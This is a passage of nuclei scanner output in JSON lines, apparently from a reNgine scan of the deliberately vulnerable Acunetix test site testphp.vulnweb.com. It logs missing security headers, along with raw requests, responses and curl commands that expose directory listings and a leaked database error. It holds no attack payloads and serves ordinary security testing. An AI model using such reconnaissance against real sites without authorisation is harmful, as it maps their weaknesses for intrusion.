vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:48.580159183Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:49.032829019Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/_mmServerScripts\",\"path\":\"/_mmServerScripts\",\"matched-at\":\"http://testphp.vulnweb.com/_mmServerScripts/\",\"request\":\"GET /_mmServerScripts HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /_mmServerScripts/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /_mmServerScripts/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"MMHTTPDB.php\\\"\\u003eMMHTTPDB.php\\u003c/a\\u003e 11-May-2011 10:27 2111\\r\\n\\u003ca href=\\\"mysql.php\\\"\\u003emysql.php\\u003c/a\\u003e 11-May-2011 10:27 10634\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:49.032874109Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:49.03288484Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testphp.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:49.032892652Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/bxss/adminPan3l\",\"path\":\"/bxss/adminPan3l\",\"matched-at\":\"http://testphp.vulnweb.com/bxss/adminPan3l/\",\"request\":\"GET /bxss/adminPan3l HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chead\\u003e\\n \\u003ctitle\\u003eAdministrative panel\\u003c/title\\u003e \\n \\u003clink rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"style.css\\\"\\u003e \\n\\u003c/head\\u003e\\n \\n\\u003cbody\\u003e\\n\\u003cp\\u003e \\n \\u003ccenter\\u003e\\n \\u003cimg src=\\\"http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\n \\u003ch2\\u003eAdministrative Panel\\u003c/h2\\u003e\\n \\u003c/center\\u003e\\n\\u003c/p\\u003e \\n \\n\\u003cb\\u003eLast 100 visitors on this site\\u003c/b\\u003e\\n\\n\\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\\n\\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\\nWebsite is out of order. Please visit back later. Thank you for understanding.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:49.195904144Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/hpp\",\"path\":\"/hpp\",\"matched-at\":\"http://testphp.vulnweb.com/hpp/\",\"request\":\"GET /hpp HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003ctitle\\u003eHTTP Parameter Pollution Example\\u003c/title\\u003e\\r\\n\\r\\n\\u003ca href=\\\"?pp=12\\\"\\u003echeck\\u003c/a\\u003e\\u003cbr/\\u003e\\r\\n\\r\\n\\u003chr\\u003e\\r\\n\\u003ca href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'\\u003eOriginal article\\u003c/a\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:49.195956544Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:49.195966469Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"request\":\"GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:49.34584149Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testphp.vulnweb.com/admin/\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /admin/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /admin/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"create.sql\\\"\\u003ecreate.sql\\u003c/a\\u003e 11-May-2011 10:27 523\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:49.345885749Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, 